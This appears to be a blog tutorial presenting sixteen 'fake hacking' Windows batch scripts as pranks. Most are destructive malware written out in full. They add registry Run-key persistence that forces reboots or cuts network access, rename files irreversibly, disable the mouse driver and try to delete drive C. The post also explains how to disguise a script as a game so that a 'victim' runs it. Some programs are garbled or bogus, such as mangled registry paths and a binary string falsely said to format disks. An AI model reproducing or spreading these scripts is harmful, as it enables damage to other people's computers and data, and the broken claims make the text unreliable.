Fake Hacking With Batch Programming

Fake Hacking With Batch Programming (16 Batch Programs)

Fake Hacking With Batch Programming : In this article we are going to learn some fake hacking tricks with the help of batch programming. I am going to show some batch programs here that you can use for fun only.

Fake Hacking With Batch Programming

Program 1: System Meltdown in windows by Batch Programming in Notepad

Simple to make fun with PC of anyone make system crash or system meltdown using notepad batch programming in windows.system meltdown, crash PC

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A Game.bat File and Run it.

Program 2: Is your antivirus working perfectly ? Check it using batch programming file

This trick will let you detect whether your antivirus working or is just a waste. We will create a file which every antivirus software will detect as virus but don’t worry it is harmless and will not harm your computer.

First open Notepad and copy below code into it.

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save the file as virus.exe

As soon as you will run this file you antivirus will detect it as software. If not then you need to change your program.

Program 3: Change Files To Non-working TXT Files

This is a new way to make virus. You can just make a simple virus in notepad and change files to non-working files Make Fun with friends.

Sometimes we want to make fun with our friends and want to tease theme, this is a new way to do this. You can just make a simple virus in notepad and change all file extensions to non-working txt files. So read this full article and make fun with your friends.

Copy following code

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Save As A internet.bat File, Now finally run the bat file. You have done! 🙂

Note: This is not reversible. Your data can be lost. so not use on important files.

Program 4: Crash Network: How To Crash Network ?

Generally you listen a word Network Crash, you can here learn that how to crash network in very simple steps. Don’t need to know any programming or coding.

CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

Save file as virus.bat

Go to Start -> All Programs Then right click on Startup -> Open

This will open startup folder, paste virus.bat file here.

*** That’s all , now the computer will automatically shutdown on every startup !

How to Spread it:
Windows doesn’t allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file and Click on CREATE SHORTCUT And now hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>> Customise>> Choose icon
Now give an attractive icon to it.
Now name it something interesting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily corrupted.

Program 5: Getting Blue Screen Of Death (BOSD): Crash PC

Crash PC: You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever you doesn’t want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed.

Fake Hacking With Batch Programming
Fake Hacking With Batch Programming

This method produces the ‘awesome’ BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to reboot it. Just follow these steps:

Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC

Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key.

Program 6: Prank Virus: Create a Prank virus in a Minute

Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.

Fake Hacking With Batch Programming
Fake Hacking With Batch Programming
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"

Program 7: Create 3000+ Folders in a Minute

Open your notepad and type the following codes (Folder Bomber)

@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Fake Hacking With Batch Programming
Fake Hacking With Batch Programming

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

Program 8: Shutdown System with Message using Batch Programming

This trick is used for shutdown your friend system, after display an message. When you friend or victim click on OK button, then the bat file force the system to shutdown. Follow these steps to turn off system.

Open Notepad and Copy/Paste the below code into Notepad.

@echo off
cls
msg * I  HATE YOU
shutdown -s -c "ERROR! YOU ARE HACKED"

Save the file with any name nut with .bat extension and close it.You can stop execution of file by typing “shutdown -a” in RUN dialog box.

Program 9: Open CMD Continuously using Batch Programming

OPEN CMD CONTINUOUSLY: This trick is used to open CMD continuously till then you want, just open Notepad and write : START, depending upon you how many times you want to open CMD, you can make as many as you would like.

Fake Hacking With Batch Programming
Fake Hacking With Batch Programming

Save file as any name you want with .bat extension. Then open that file and you observe that how many times you write START in Notepad, the CMD console box is open same as number of START written in Notepad.

Program 10: Open Notepad Continuously

BATCH FILE COMMANDS: You want to make fun with your friends and want to tease theme, than it is the best way to do it.

Follow these steps to open Notepad continuously:

Open Notepad. Copy the below mentioned text in your notepad file:

@echo off
:TOP
START %SystemRoot%/system32/notepad.exe
goto TOP

Save the file with any name nut with .bat extension and close it.

Now open the file and see how it annoys you by opening notepad again and again. you can also save this .bat file into the C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder, so when you start your computer then file runs into your computer & then Notepad continuously open in window.

Program 11: Continuously Repeat Message

Using this notepad trick you can annoy anyone and can actually force them to log off . This notepad trick will create an infinite cycle of a message in the computer using batch file commands . Follow the steps to know more:

Open Notepad. Copy the below mentioned text in your notepad file:

@echo off
:BEGIN
msg * Welcome
msg * To
msg * HACKING begins
msg * Thanks for visiting
goto BEGIN

Save the file with .bat extension like message.bat. After saving the file just open it (by double clicking) and see what happens.

Program 12: Disable Computer Mouse

Let’s do some fun with your friend’s pc by disabling his pc mouse. It’s a very simple but dangerous method. By this technique anybody can be freaked out. Don’t do ever this with your own PC. You may use this to annoy your enemy. We can also say that we are going to make a sort of computer virus. To attack you enemy’s computer, you got to send the coding file by anyhow. When he will open the file, he will be in big trouble and it is too hard to repair. Only for fun you can use this coding with a pen drive. When anybody plug-in this pen drive his mouse won’t work. When he will release the pen drive then the pc will remain on its previous condition. I mean, it will become normal.

Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save this file as virus.bat, Done you just created your virus.

Program 13: Open no. of sites on single click

I visit multiple websites, multiple times daily. Typing the names of these websites over and over again becomes too time consuming and obviously, boring. I figured out a way to create a desktop shortcut for it through which you can open unlimited number of websites in multiple browser tabs.

Basically we have to create a batch file to open multiple websites. If you have read the post in the link above you will learn to make batch file for opening multiple applications, but for the sake of convenience I am going to teach you to make a batch file to open multiple websites at once. The method is almost same, but instead of application target, we will enter website URL.

To begin, create a new text document in the desktop and type,

@echo off

Now below it write,

start “website name” “website url”

and add as many websites as you like. After you have typed all the websites that you want to open, save the file as test.bat or you can name it anything, but note to save it as batch file(.bat).

Below is an example of my batch file,

@echo off
start “MyTechnode.Com” “https://mytechnode.com/”
start “Madhuma Corporation” “https://madhuma.com”
start “EXIM360” “https://exim360.co/”

Program 14: Format hard disk using binary code (Notepad Tricks)

Now we make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don’t try this on your own computer or else you will end up formatting your own computer.

Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000

Save the file as Format.exe, You just created virus to format Hard Drive. Enjoy !!!

Program 15: How To Make Dangerous Virus In A Minute without any software

This is a very Dangerous Virus don’t try it on your working PC or there have some important data, because by running this file or virus code your C Drive will completely deleted and you can not restore it, so be careful to do this thing. Its only a knowledgeable thing not for experimental.

What will this dangerous virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

Open Notepad and copy below code into it.

@Echo off 
Del C: *.* |y

Save this file as virus.bat (Name can be anything but .bat extension is must)

Now, running this file will delete all the content of C Drive.Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer. (It is very dangerous virus for any computer and operating system)

Program 16: How To Disable Internet Permanently

Sometimes we need to disable internet permanently for fun or some reasons. In this post you will learn how can we disable internet permanently on our pc or someone others pc.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save it AS free.Bat

Hand Picked Articles That You Must Read

Leave a Comment

Your email address will not be published. Required fields are marked *